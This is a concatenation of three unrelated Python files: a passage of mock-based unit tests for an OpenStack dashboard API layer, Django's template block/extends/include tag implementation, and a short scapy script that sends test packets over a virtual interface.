ret_val = api.flavor_delete(self.request, FLAVOR_ID, purge=True)
self.assertIsNone(ret_val)
def test_service_get(self):
NAME = 'serviceName'
admin_api = self.stub_admin_api()
admin_api.services = self.mox.CreateMockAnything()
admin_api.services.get(NAME).AndReturn(TEST_RETURN)
self.mox.ReplayAll()
ret_val = api.service_get(self.request, NAME)
self.assertIsInstance(ret_val, api.Services)
self.assertEqual(ret_val._apiresource, TEST_RETURN)
self.mox.VerifyAll()
def test_service_list(self):
services = (TEST_RETURN, TEST_RETURN + '2')
admin_api = self.stub_admin_api()
admin_api.services = self.mox.CreateMockAnything()
admin_api.services.list().AndReturn(services)
self.mox.ReplayAll()
ret_val = api.service_list(self.request)
for service in ret_val:
self.assertIsInstance(service, api.Services)
self.assertIn(service._apiresource, services)
self.mox.VerifyAll()
def test_service_update(self):
ENABLED = True
NAME = 'serviceName'
admin_api = self.stub_admin_api()
admin_api.services = self.mox.CreateMockAnything()
admin_api.services.update(NAME, ENABLED).AndReturn(TEST_RETURN)
self.mox.ReplayAll()
ret_val = api.service_update(self.request, NAME, ENABLED)
self.assertIsInstance(ret_val, api.Services)
self.assertEqual(ret_val._apiresource, TEST_RETURN)
self.mox.VerifyAll()
class AuthApiTests(test.TestCase):
def test_get_auth_api(self):
settings.OPENSTACK_KEYSTONE_URL = TEST_URL
self.mox.StubOutClassWithMocks(OSAuth, 'Auth')
OSAuth.Auth(management_url=settings.OPENSTACK_KEYSTONE_URL)
self.mox.ReplayAll()
self.assertIsNotNone(api.auth_api())
self.mox.VerifyAll()
def test_token_get_tenant(self):
self.mox.StubOutWithMock(api, 'auth_api')
auth_api_mock = self.mox.CreateMockAnything()
api.auth_api().AndReturn(auth_api_mock)
tenants_mock = self.mox.CreateMockAnything()
auth_api_mock.tenants = tenants_mock
tenant_list = [Tenant('notTheDroid',
'notTheDroid_desc',
False),
Tenant(TEST_TENANT_ID,
TEST_TENANT_DESCRIPTION,
True),
]
tenants_mock.for_token('aToken').AndReturn(tenant_list)
self.request.session = {'token': 'aToken'}
self.mox.ReplayAll()
ret_val = api.token_get_tenant(self.request, TEST_TENANT_ID)
self.assertEqual(tenant_list[1], ret_val)
self.mox.VerifyAll()
def test_token_get_tenant_no_tenant(self):
self.mox.StubOutWithMock(api, 'auth_api')
auth_api_mock = self.mox.CreateMockAnything()
api.auth_api().AndReturn(auth_api_mock)
tenants_mock = self.mox.CreateMockAnything()
auth_api_mock.tenants = tenants_mock
tenant_list = [Tenant('notTheDroid',
'notTheDroid_desc',
False),
]
tenants_mock.for_token('aToken').AndReturn(tenant_list)
self.request.session = {'token': 'aToken'}
self.mox.ReplayAll()
ret_val = api.token_get_tenant(self.request, TEST_TENANT_ID)
self.assertIsNone(ret_val)
self.mox.VerifyAll()
def test_token_list_tenants(self):
self.mox.StubOutWithMock(api, 'auth_api')
auth_api_mock = self.mox.CreateMockAnything()
api.auth_api().AndReturn(auth_api_mock)
tenants_mock = self.mox.CreateMockAnything()
auth_api_mock.tenants = tenants_mock
tenant_list = [Tenant('notTheDroid',
'notTheDroid_desc',
False),
Tenant(TEST_TENANT_ID,
TEST_TENANT_DESCRIPTION,
True),
]
tenants_mock.for_token('aToken').AndReturn(tenant_list)
self.mox.ReplayAll()
ret_val = api.token_list_tenants(self.request, 'aToken')
for tenant in ret_val:
self.assertIn(tenant, tenant_list)
self.mox.VerifyAll()
def test_token_create(self):
self.mox.StubOutWithMock(api, 'auth_api')
auth_api_mock = self.mox.CreateMockAnything()
api.auth_api().AndReturn(auth_api_mock)
tokens_mock = self.mox.CreateMockAnything()
auth_api_mock.tokens = tokens_mock
test_token = Token(TEST_TOKEN_ID, TEST_USERNAME, TEST_TENANT_ID)
tokens_mock.create(TEST_TENANT_ID, TEST_USERNAME,
TEST_PASSWORD).AndReturn(test_token)
self.mox.ReplayAll()
ret_val = api.token_create(self.request, TEST_TENANT_ID,
TEST_USERNAME, TEST_PASSWORD)
self.assertEqual(test_token, ret_val)
self.mox.VerifyAll()
class ComputeApiTests(test.TestCase):
def stub_compute_api(self, count=1):
self.mox.StubOutWithMock(api, 'compute_api')
compute_api = self.mox.CreateMock(OSCompute.Compute)
for i in range(count):
api.compute_api(IsA(http.HttpRequest)).AndReturn(compute_api)
return compute_api
def test_get_compute_api(self):
class ComputeClient(object):
__slots__ = ['auth_token', 'management_url']
self.mox.StubOutClassWithMocks(OSCompute, 'Compute')
compute_api = OSCompute.Compute(auth_token=TEST_TOKEN,
management_url=TEST_URL)
compute_api.client = ComputeClient()
self.mox.StubOutWithMock(api, 'url_for')
# called three times? Looks like a good place for optimization
api.url_for(IsA(http.HttpRequest), 'nova').AndReturn(TEST_URL)
api.url_for(IsA(http.HttpRequest), 'nova').AndReturn(TEST_URL)
api.url_for(IsA(http.HttpRequest), 'nova').AndReturn(TEST_URL)
self.mox.ReplayAll()
compute_api = api.compute_api(self.request)
self.assertIsNotNone(compute_api)
self.assertEqual(compute_api.client.auth_token, TEST_TOKEN)
self.assertEqual(compute_api.client.management_url, TEST_URL)
self.mox.VerifyAll()
def test_flavor_get(self):
FLAVOR_ID = 6
compute_api = self.stub_compute_api()
compute_api.flavors = self.mox.CreateMockAnything()
compute_api.flavors.get(FLAVOR_ID).AndReturn(TEST_RETURN)
self.mox.ReplayAll()
ret_val = api.flavor_get(self.request, FLAVOR_ID)
self.assertIsInstance(ret_val, api.Flavor)
self.assertEqual(ret_val._apiresource, TEST_RETURN)
self.mox.VerifyAll()
def test_server_delete(self):
INSTANCE = 'anInstance'
compute_api = self.stub_compute_api()
compute_api.servers = self.mox.CreateMockAnything()
compute_api.servers.delete(INSTANCE).AndReturn(TEST_RETURN)
self.mox.ReplayAll()
ret_val = api.server_delete(self.request, INSTANCE)
self.assertIsNone(ret_val)
self.mox.VerifyAll()
def test_server_get(self):
INSTANCE_ID = '2'
compute_api = self.stub_compute_api()
compute_api.servers = self.mox.CreateMockAnything()
compute_api.servers.get(INSTANCE_ID).AndReturn(TEST_RETURN)
self.mox.ReplayAll()
ret_val = api.server_get(self.request, INSTANCE_ID)
self.assertIsInstance(ret_val, api.Server)
self.assertEqual(ret_val._apiresource, TEST_RETURN)
self.mox.VerifyAll()
def test_server_reboot(self):
INSTANCE_ID = '2'
HARDNESS = 'diamond'
self.mox.StubOutWithMock(api, 'server_get')
server = self.mox.CreateMock(OSCompute.Server)
server.reboot(OSCompute.servers.REBOOT_HARD).AndReturn(TEST_RETURN)
api.server_get(IsA(http.HttpRequest), INSTANCE_ID).AndReturn(server)
server = self.mox.CreateMock(OSCompute.Server)
server.reboot(HARDNESS).AndReturn(TEST_RETURN)
api.server_get(IsA(http.HttpRequest), INSTANCE_ID).AndReturn(server)
self.mox.ReplayAll()
ret_val = api.server_reboot(self.request, INSTANCE_ID)
self.assertIsNone(ret_val)
ret_val = api.server_reboot(self.request, INSTANCE_ID,
hardness=HARDNESS)
self.assertIsNone(ret_val)
self.mox.VerifyAll()
class ExtrasApiTests(test.TestCase):
def stub_extras_api(self, count=1):
self.mox.StubOutWithMock(api, 'extras_api')
extras_api = self.mox.CreateMock(OSExtras.Extras)
for i in range(count):
api.extras_api(IsA(http.HttpRequest)).AndReturn(extras_api)
return extras_api
def test_get_extras_api(self):
self.mox.StubOutClassWithMocks(OSExtras, 'Extras')
OSExtras.Extras(auth_token=TEST_TOKEN, management_url=TEST_URL)
self.mox.StubOutWithMock(api, 'url_for')
api.url_for(IsA(http.HttpRequest), 'nova').AndReturn(TEST_URL)
api.url_for(IsA(http.HttpRequest), 'nova').AndReturn(TEST_URL)
self.mox.ReplayAll()
self.assertIsNotNone(api.extras_api(self.request))
self.mox.VerifyAll()
def test_console_create(self):
extras_api = self.stub_extras_api(count=2)
extras_api.consoles = self.mox.CreateMockAnything()
extras_api.consoles.create(
TEST_INSTANCE_ID, TEST_CONSOLE_KIND).AndReturn(TEST_RETURN)
extras_api.consoles.create(
TEST_INSTANCE_ID, 'text').AndReturn(TEST_RETURN + '2')
self.mox.ReplayAll()
ret_val = api.console_create(self.request,
TEST_INSTANCE_ID,
TEST_CONSOLE_KIND)
self.assertIsInstance(ret_val, api.Console)
self.assertEqual(ret_val._apiresource, TEST_RETURN)
ret_val = api.console_create(self.request, TEST_INSTANCE_ID)
self.assertIsInstance(ret_val, api.Console)
self.assertEqual(ret_val._apiresource, TEST_RETURN + '2')
self.mox.VerifyAll()
def test_flavor_list(self):
flavors = (TEST_RETURN, TEST_RETURN + '2')
extras_api = self.stub_extras_api()
extras_api.flavors = self.mox.CreateMockAnything()
extras_api.flavors.list().AndReturn(flavors)
self.mox.ReplayAll()
ret_val = api.flavor_list(self.request)
self.assertEqual(len(ret_val), len(flavors))
for flavor in ret_val:
self.assertIsInstance(flavor, api.Flavor)
self.assertIn(flavor._apiresource, flavors)
self.mox.VerifyAll()
def test_keypair_create(self):
NAME = '1'
extras_api = self.stub_extras_api()
extras_api.keypairs = self.mox.CreateMockAnything()
extras_api.keypairs.create(NAME).AndReturn(TEST_RETURN)
self.mox.ReplayAll()
ret_val = api.keypair_create(self.request, NAME)
self.assertIsInstance(ret_val, api.KeyPair)
self.assertEqual(ret_val._apiresource, TEST_RETURN)
self.mox.VerifyAll()
def test_keypair_delete(self):
KEYPAIR_ID = '1'
extras_api = self.stub_extras_api()
extras_api.keypairs = self.mox.CreateMockAnything()
extras_api.keypairs.delete(KEYPAIR_ID).AndReturn(TEST_RETURN)
self.mox.ReplayAll()
ret_val = api.keypair_delete(self.request, KEYPAIR_ID)
self.assertIsNone(ret_val)
self.mox.VerifyAll()
def test_keypair_list(self):
NAME = 'keypair'
keypairs = (NAME + '1', NAME + '2')
extras_api = self.stub_extras_api()
extras_api.keypairs = self.mox.CreateMockAnything()
extras_api.keypairs.list().AndReturn(keypairs)
self.mox.ReplayAll()
ret_val = api.keypair_list(self.request)
self.assertEqual(len(ret_val), len(keypairs))
for keypair in ret_val:
self.assertIsInstance(keypair, api.KeyPair)
self.assertIn(keypair._apiresource, keypairs)
self.mox.VerifyAll()
def test_server_create(self):
NAME = 'server'
IMAGE = 'anImage'
FLAVOR = 'cherry'
USER_DATA = {'nuts': 'berries'}
KEY = 'user'
extras_api = self.stub_extras_api()
extras_api.servers = self.mox.CreateMockAnything()
extras_api.servers.create(NAME, IMAGE, FLAVOR, user_data=USER_DATA,
key_name=KEY).AndReturn(TEST_RETURN)
self.mox.ReplayAll()
ret_val = api.server_create(self.request, NAME, IMAGE, FLAVOR,
KEY, USER_DATA)
self.assertIsInstance(ret_val, api.Server)
self.assertEqual(ret_val._apiresource, TEST_RETURN)
self.mox.VerifyAll()
def test_server_list(self):
servers = (TEST_RETURN, TEST_RETURN + '2')
extras_api = self.stub_extras_api()
extras_api.servers = self.mox.CreateMockAnything()
extras_api.servers.list().AndReturn(servers)
self.mox.ReplayAll()
ret_val = api.server_list(self.request)
self.assertEqual(len(ret_val), len(servers))
for server in ret_val:
self.assertIsInstance(server, api.Server)
self.assertIn(server._apiresource, servers)
self.mox.VerifyAll()
def test_usage_get(self):
extras_api = self.stub_extras_api()
extras_api.usage = self.mox.CreateMockAnything()
extras_api.usage.get(TEST_TENANT_ID, 'start',
'end').AndReturn(TEST_RETURN)
self.mox.ReplayAll()
ret_val = api.usage_get(self.request, TEST_TENANT_ID, 'start', 'end')
self.assertIsInstance(ret_val, api.Usage)
self.assertEqual(ret_val._apiresource, TEST_RETURN)
self.mox.VerifyAll()
def test_usage_list(self):
usages = (TEST_RETURN, TEST_RETURN + '2')
extras_api = self.stub_extras_api()
extras_api.usage = self.mox.CreateMockAnything()
extras_api.usage.list('start', 'end').AndReturn(usages)
self.mox.ReplayAll()
ret_val = api.usage_list(self.request, 'start', 'end')
self.assertEqual(len(ret_val), len(usages))
for usage in ret_val:
self.assertIsInstance(usage, api.Usage)
self.assertIn(usage._apiresource, usages)
self.mox.VerifyAll()
class GlanceApiTests(test.TestCase):
def stub_glance_api(self, count=1):
self.mox.StubOutWithMock(api, 'glance_api')
glance_api = self.mox.CreateMock(glance_client.Client)
for i in range(count):
api.glance_api(IsA(http.HttpRequest)).AndReturn(glance_api)
return glance_api
def test_get_glance_api(self):
self.mox.StubOutClassWithMocks(glance_client, 'Client')
glance_client.Client(TEST_HOSTNAME, TEST_PORT)
self.mox.StubOutWithMock(api, 'url_for')
api.url_for(IsA(http.HttpRequest), 'glance').AndReturn(TEST_URL)
self.mox.ReplayAll()
self.assertIsNotNone(api.glance_api(self.request))
self.mox.VerifyAll()
def test_image_create(self):
IMAGE_FILE = 'someData'
IMAGE_META = {'metadata': 'foo'}
glance_api = self.stub_glance_api()
glance_api.add_image(IMAGE_META, IMAGE_FILE).AndReturn(TEST_RETURN)
self.mox.ReplayAll()
ret_val = api.image_create(self.request, IMAGE_META, IMAGE_FILE)
self.assertIsInstance(ret_val, api.Image)
self.assertEqual(ret_val._apidict, TEST_RETURN)
self.mox.VerifyAll()
def test_image_delete(self):
IMAGE_ID = '1'
glance_api = self.stub_glance_api()
glance_api.delete_image(IMAGE_ID).AndReturn(TEST_RETURN)
self.mox.ReplayAll()
ret_val = api.image_delete(self.request, IMAGE_ID)
self.assertEqual(ret_val, TEST_RETURN)
self.mox.VerifyAll()
def test_image_get(self):
IMAGE_ID = '1'
glance_api = self.stub_glance_api()
glance_api.get_image(IMAGE_ID).AndReturn([TEST_RETURN])
self.mox.ReplayAll()
ret_val = api.image_get(self.request, IMAGE_ID)
self.assertIsInstance(ret_val, api.Image)
self.assertEqual(ret_val._apidict, TEST_RETURN)
def test_image_list_detailed(self):
images = (TEST_RETURN, TEST_RETURN + '2')
glance_api = self.stub_glance_api()
glance_api.get_images_detailed().AndReturn(images)
self.mox.ReplayAll()
ret_val = api.image_list_detailed(self.request)
self.assertEqual(len(ret_val), len(images))
for image in ret_val:
self.assertIsInstance(image, api.Image)
self.assertIn(image._apidict, images)
self.mox.VerifyAll()
def test_image_update(self):
IMAGE_ID = '1'
IMAGE_META = {'metadata': 'foobar'}
glance_api = self.stub_glance_api(count=2)
glance_api.update_image(IMAGE_ID, image_meta={}).AndReturn(TEST_RETURN)
glance_api.update_image(IMAGE_ID,
image_meta=IMAGE_META).AndReturn(TEST_RETURN)
self.mox.ReplayAll()
ret_val = api.image_update(self.request, IMAGE_ID)
self.assertIsInstance(ret_val, api.Image)
self.assertEqual(ret_val._apidict, TEST_RETURN)
ret_val = api.image_update(self.request,
IMAGE_ID,
image_meta=IMAGE_META)
self.assertIsInstance(ret_val, api.Image)
self.assertEqual(ret_val._apidict, TEST_RETURN)
self.mox.VerifyAll()
class SwiftApiTests(test.TestCase):
def setUp(self):
self.mox = mox.Mox()
self.request = http.HttpRequest()
self.request.session = dict()
self.request.session['token'] = TEST_TOKEN
def tearDown(self):
self.mox.UnsetStubs()
def stub_swift_api(self, count=1):
self.mox.StubOutWithMock(api, 'swift_api')
swift_api = self.mox.CreateMock(cloudfiles.connection.Connection)
for i in range(count):
api.swift_api(IsA(http.HttpRequest)).AndReturn(swift_api)
return swift_api
def test_swift_get_containers(self):
containers = (TEST_RETURN, TEST_RETURN + '2')
swift_api = self.stub_swift_api()
swift_api.get_all_containers().AndReturn(containers)
self.mox.ReplayAll()
ret_val = api.swift_get_containers(self.request)
self.assertEqual(len(ret_val), len(containers))
for container in ret_val:
self.assertIsInstance(container, api.Container)
self.assertIn(container._apiresource, containers)
self.mox.VerifyAll()
def test_swift_create_container(self):
NAME = 'containerName'
swift_api = self.stub_swift_api()
self.mox.StubOutWithMock(api, 'swift_container_exists')
api.swift_container_exists(self.request,
NAME).AndReturn(False)
swift_api.create_container(NAME).AndReturn(TEST_RETURN)
self.mox.ReplayAll()
ret_val = api.swift_create_container(self.request, NAME)
self.assertIsInstance(ret_val, api.Container)
self.assertEqual(ret_val._apiresource, TEST_RETURN)
self.mox.VerifyAll()
def test_swift_delete_container(self):
NAME = 'containerName'
swift_api = self.stub_swift_api()
swift_api.delete_container(NAME).AndReturn(TEST_RETURN)
self.mox.ReplayAll()
ret_val = api.swift_delete_container(self.request, NAME)
self.assertIsNone(ret_val)
self.mox.VerifyAll()
def test_swift_get_objects(self):
NAME = 'containerName'
swift_objects = (TEST_RETURN, TEST_RETURN + '2')
container = self.mox.CreateMock(cloudfiles.container.Container)
container.get_objects(prefix=None).AndReturn(swift_objects)
swift_api = self.stub_swift_api()
swift_api.get_container(NAME).AndReturn(container)
self.mox.ReplayAll()
ret_val = api.swift_get_objects(self.request, NAME)
self.assertEqual(len(ret_val), len(swift_objects))
for swift_object in ret_val:
self.assertIsInstance(swift_object, api.SwiftObject)
self.assertIn(swift_object._apiresource, swift_objects)
self.mox.VerifyAll()
def test_swift_get_objects_with_prefix(self):
NAME = 'containerName'
PREFIX = 'prefacedWith'
swift_objects = (TEST_RETURN, TEST_RETURN + '2')
container = self.mox.CreateMock(cloudfiles.container.Container)
container.get_objects(prefix=PREFIX).AndReturn(swift_objects)
swift_api = self.stub_swift_api()
swift_api.get_container(NAME).AndReturn(container)
self.mox.ReplayAll()
ret_val = api.swift_get_objects(self.request,
NAME,
prefix=PREFIX)
self.assertEqual(len(ret_val), len(swift_objects))
for swift_object in ret_val:
self.assertIsInstance(swift_object, api.SwiftObject)
self.assertIn(swift_object._apiresource, swift_objects)
self.mox.VerifyAll()
def test_swift_upload_object(self):
CONTAINER_NAME = 'containerName'
OBJECT_NAME = 'objectName'
OBJECT_DATA = 'someData'
swift_api = self.stub_swift_api()
container = self.mox.CreateMock(cloudfiles.container.Container)
swift_object = self.mox.CreateMock(cloudfiles.storage_object.Object)
swift_api.get_container(CONTAINER_NAME).AndReturn(container)
container.create_object(OBJECT_NAME).AndReturn(swift_object)
swift_object.write(OBJECT_DATA).AndReturn(TEST_RETURN)
self.mox.ReplayAll()
ret_val = api.swift_upload_object(self.request,
CONTAINER_NAME,
OBJECT_NAME,
OBJECT_DATA)
self.assertIsNone(ret_val)
self.mox.VerifyAll()
def test_swift_delete_object(self):
CONTAINER_NAME = 'containerName'
OBJECT_NAME = 'objectName'
swift_api = self.stub_swift_api()
container = self.mox.CreateMock(cloudfiles.container.Container)
swift_api.get_container(CONTAINER_NAME).AndReturn(container)
container.delete_object(OBJECT_NAME).AndReturn(TEST_RETURN)
self.mox.ReplayAll()
ret_val = api.swift_delete_object(self.request,
CONTAINER_NAME,
OBJECT_NAME)
self.assertIsNone(ret_val)
self.mox.VerifyAll()
def test_swift_get_object_data(self):
CONTAINER_NAME = 'containerName'
OBJECT_NAME = 'objectName'
OBJECT_DATA = 'objectData'
swift_api = self.stub_swift_api()
container = self.mox.CreateMock(cloudfiles.container.Container)
swift_object = self.mox.CreateMock(cloudfiles.storage_object.Object)
swift_api.get_container(CONTAINER_NAME).AndReturn(container)
container.get_object(OBJECT_NAME).AndReturn(swift_object)
swift_object.stream().AndReturn(OBJECT_DATA)
self.mox.ReplayAll()
ret_val = api.swift_get_object_data(self.request,
CONTAINER_NAME,
OBJECT_NAME)
self.assertEqual(ret_val, OBJECT_DATA)
self.mox.VerifyAll()
def test_swift_object_exists(self):
CONTAINER_NAME = 'containerName'
OBJECT_NAME = 'objectName'
swift_api = self.stub_swift_api()
container = self.mox.CreateMock(cloudfiles.container.Container)
swift_object = self.mox.CreateMock(cloudfiles.Object)
swift_api.get_container(CONTAINER_NAME).AndReturn(container)
container.get_object(OBJECT_NAME).AndReturn(swift_object)
self.mox.ReplayAll()
ret_val = api.swift_object_exists(self.request,
CONTAINER_NAME,
OBJECT_NAME)
self.assertTrue(ret_val)
self.mox.VerifyAll()
def test_swift_copy_object(self):
CONTAINER_NAME = 'containerName'
OBJECT_NAME = 'objectName'
swift_api = self.stub_swift_api()
container = self.mox.CreateMock(cloudfiles.container.Container)
self.mox.StubOutWithMock(api, 'swift_object_exists')
swift_object = self.mox.CreateMock(cloudfiles.Object)
swift_api.get_container(CONTAINER_NAME).AndReturn(container)
api.swift_object_exists(self.request,
CONTAINER_NAME,
OBJECT_NAME).AndReturn(False)
container.get_object(OBJECT_NAME).AndReturn(swift_object)
swift_object.copy_to(CONTAINER_NAME, OBJECT_NAME)
self.mox.ReplayAll()
ret_val = api.swift_copy_object(self.request, CONTAINER_NAME,
OBJECT_NAME, CONTAINER_NAME,
OBJECT_NAME)
self.assertIsNone(ret_val)
self.mox.VerifyAll()
|
|
from collections import defaultdict
from django.utils import six
from django.utils.safestring import mark_safe
from .base import (
Node, Template, TemplateSyntaxError, TextNode, Variable, token_kwargs,
)
from .library import Library
register = Library()
BLOCK_CONTEXT_KEY = 'block_context'
class ExtendsError(Exception):
pass
class BlockContext(object):
def __init__(self):
# Dictionary of FIFO queues.
self.blocks = defaultdict(list)
def add_blocks(self, blocks):
for name, block in six.iteritems(blocks):
self.blocks[name].insert(0, block)
def pop(self, name):
try:
return self.blocks[name].pop()
except IndexError:
return None
def push(self, name, block):
self.blocks[name].append(block)
def get_block(self, name):
try:
return self.blocks[name][-1]
except IndexError:
return None
class BlockNode(Node):
def __init__(self, name, nodelist, parent=None):
self.name, self.nodelist, self.parent = name, nodelist, parent
def __repr__(self):
return "<Block Node: %s. Contents: %r>" % (self.name, self.nodelist)
def render(self, context):
block_context = context.render_context.get(BLOCK_CONTEXT_KEY)
with context.push():
if block_context is None:
context['block'] = self
result = self.nodelist.render(context)
else:
push = block = block_context.pop(self.name)
if block is None:
block = self
# Create new block so we can store context without thread-safety issues.
block = type(self)(block.name, block.nodelist)
block.context = context
context['block'] = block
result = block.nodelist.render(context)
if push is not None:
block_context.push(self.name, push)
return result
def super(self):
if not hasattr(self, 'context'):
raise TemplateSyntaxError(
"'%s' object has no attribute 'context'. Did you use "
"{{ block.super }} in a base template?" % self.__class__.__name__
)
render_context = self.context.render_context
if (BLOCK_CONTEXT_KEY in render_context and
render_context[BLOCK_CONTEXT_KEY].get_block(self.name) is not None):
return mark_safe(self.render(self.context))
return ''
class ExtendsNode(Node):
must_be_first = True
context_key = 'extends_context'
def __init__(self, nodelist, parent_name, template_dirs=None):
self.nodelist = nodelist
self.parent_name = parent_name
self.template_dirs = template_dirs
self.blocks = {n.name: n for n in nodelist.get_nodes_by_type(BlockNode)}
def __repr__(self):
return '<ExtendsNode: extends %s>' % self.parent_name.token
def find_template(self, template_name, context):
"""
This is a wrapper around engine.find_template(). A history is kept in
the render_context attribute between successive extends calls and
passed as the skip argument. This enables extends to work recursively
without extending the same template twice.
"""
# RemovedInDjango21Warning: If any non-recursive loaders are installed
# do a direct template lookup. If the same template name appears twice,
# raise an exception to avoid system recursion.
for loader in context.template.engine.template_loaders:
if not loader.supports_recursion:
history = context.render_context.setdefault(
self.context_key, [context.template.origin.template_name],
)
if template_name in history:
raise ExtendsError(
"Cannot extend templates recursively when using "
"non-recursive template loaders",
)
template = context.template.engine.get_template(template_name)
history.append(template_name)
return template
history = context.render_context.setdefault(
self.context_key, [context.template.origin],
)
template, origin = context.template.engine.find_template(
template_name, skip=history,
)
history.append(origin)
return template
def get_parent(self, context):
parent = self.parent_name.resolve(context)
if not parent:
error_msg = "Invalid template name in 'extends' tag: %r." % parent
if self.parent_name.filters or\
isinstance(self.parent_name.var, Variable):
error_msg += " Got this from the '%s' variable." %\
self.parent_name.token
raise TemplateSyntaxError(error_msg)
if isinstance(parent, Template):
# parent is a django.template.Template
return parent
if isinstance(getattr(parent, 'template', None), Template):
# parent is a django.template.backends.django.Template
return parent.template
return self.find_template(parent, context)
def render(self, context):
compiled_parent = self.get_parent(context)
if BLOCK_CONTEXT_KEY not in context.render_context:
context.render_context[BLOCK_CONTEXT_KEY] = BlockContext()
block_context = context.render_context[BLOCK_CONTEXT_KEY]
# Add the block nodes from this node to the block context
block_context.add_blocks(self.blocks)
# If this block's parent doesn't have an extends node it is the root,
# and its block nodes also need to be added to the block context.
for node in compiled_parent.nodelist:
# The ExtendsNode has to be the first non-text node.
if not isinstance(node, TextNode):
if not isinstance(node, ExtendsNode):
blocks = {n.name: n for n in
compiled_parent.nodelist.get_nodes_by_type(BlockNode)}
block_context.add_blocks(blocks)
break
# Call Template._render explicitly so the parser context stays
# the same.
return compiled_parent._render(context)
class IncludeNode(Node):
context_key = '__include_context'
def __init__(self, template, *args, **kwargs):
self.template = template
self.extra_context = kwargs.pop('extra_context', {})
self.isolated_context = kwargs.pop('isolated_context', False)
super(IncludeNode, self).__init__(*args, **kwargs)
def render(self, context):
"""
Render the specified template and context. Cache the template object
in render_context to avoid reparsing and loading when used in a for
loop.
"""
try:
template = self.template.resolve(context)
# Does this quack like a Template?
if not callable(getattr(template, 'render', None)):
# If not, we'll try our cache, and get_template()
template_name = template
cache = context.render_context.setdefault(self.context_key, {})
template = cache.get(template_name)
if template is None:
template = context.template.engine.get_template(template_name)
cache[template_name] = template
values = {
name: var.resolve(context)
for name, var in six.iteritems(self.extra_context)
}
if self.isolated_context:
return template.render(context.new(values))
with context.push(**values):
return template.render(context)
except Exception:
if context.template.engine.debug:
raise
return ''
@register.tag('block')
def do_block(parser, token):
"""
Define a block that can be overridden by child templates.
"""
# token.split_contents() isn't useful here because this tag doesn't accept variable as arguments
bits = token.contents.split()
if len(bits) != 2:
raise TemplateSyntaxError("'%s' tag takes only one argument" % bits[0])
block_name = bits[1]
# Keep track of the names of BlockNodes found in this template, so we can
# check for duplication.
try:
if block_name in parser.__loaded_blocks:
raise TemplateSyntaxError("'%s' tag with name '%s' appears more than once" % (bits[0], block_name))
parser.__loaded_blocks.append(block_name)
except AttributeError: # parser.__loaded_blocks isn't a list yet
parser.__loaded_blocks = [block_name]
nodelist = parser.parse(('endblock',))
# This check is kept for backwards-compatibility. See #3100.
endblock = parser.next_token()
acceptable_endblocks = ('endblock', 'endblock %s' % block_name)
if endblock.contents not in acceptable_endblocks:
parser.invalid_block_tag(endblock, 'endblock', acceptable_endblocks)
return BlockNode(block_name, nodelist)
@register.tag('extends')
def do_extends(parser, token):
"""
Signal that this template extends a parent template.
This tag may be used in two ways: ``{% extends "base" %}`` (with quotes)
uses the literal value "base" as the name of the parent template to extend,
or ``{% extends variable %}`` uses the value of ``variable`` as either the
name of the parent template to extend (if it evaluates to a string) or as
the parent template itself (if it evaluates to a Template object).
"""
bits = token.split_contents()
if len(bits) != 2:
raise TemplateSyntaxError("'%s' takes one argument" % bits[0])
parent_name = parser.compile_filter(bits[1])
nodelist = parser.parse()
if nodelist.get_nodes_by_type(ExtendsNode):
raise TemplateSyntaxError("'%s' cannot appear more than once in the same template" % bits[0])
return ExtendsNode(nodelist, parent_name)
@register.tag('include')
def do_include(parser, token):
"""
Loads a template and renders it with the current context. You can pass
additional context using keyword arguments.
Example::
{% include "foo/some_include" %}
{% include "foo/some_include" with bar="BAZZ!" baz="BING!" %}
Use the ``only`` argument to exclude the current context when rendering
the included template::
{% include "foo/some_include" only %}
{% include "foo/some_include" with bar="1" only %}
"""
bits = token.split_contents()
if len(bits) < 2:
raise TemplateSyntaxError(
"%r tag takes at least one argument: the name of the template to "
"be included." % bits[0]
)
options = {}
remaining_bits = bits[2:]
while remaining_bits:
option = remaining_bits.pop(0)
if option in options:
raise TemplateSyntaxError('The %r option was specified more '
'than once.' % option)
if option == 'with':
value = token_kwargs(remaining_bits, parser, support_legacy=False)
if not value:
raise TemplateSyntaxError('"with" in %r tag needs at least '
'one keyword argument.' % bits[0])
elif option == 'only':
value = True
else:
raise TemplateSyntaxError('Unknown argument for %r tag: %r.' %
(bits[0], option))
options[option] = value
isolated_context = options.get('only', False)
namemap = options.get('with', {})
return IncludeNode(parser.compile_filter(bits[1]), extra_context=namemap,
isolated_context=isolated_context)
|
|
#!/usr/bin/python
# Copyright 2013-present Barefoot Networks, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from scapy.all import sniff, sendp
from scapy.all import Packet
from scapy.all import ShortField, IntField, LongField, BitField
from scapy.all import Ether, IP, TCP
import networkx as nx
import sys
def main():
if len(sys.argv) != 1:
print "Usage: send2.py"
sys.exit(1)
srcmac = '00:aa:bb:00:00:00'
dstmac = '00:aa:bb:00:00:01'
port = 80
msg = 'hi'
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '111.37.250.218', dst = '3.248.234.184') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '142.54.3.18', dst = '35.240.203.247') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '112.119.163.206', dst = '1.102.89.68') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '111.37.250.218', dst = '3.248.234.184') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '205.38.229.41', dst = '66.216.25.163') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '43.255.233.20', dst = '221.46.220.203') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '6.172.207.28', dst = '208.89.117.253') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '43.139.101.173', dst = '1.0.3.222') / msg
sendp(p, iface = "veth0", verbose = 0)
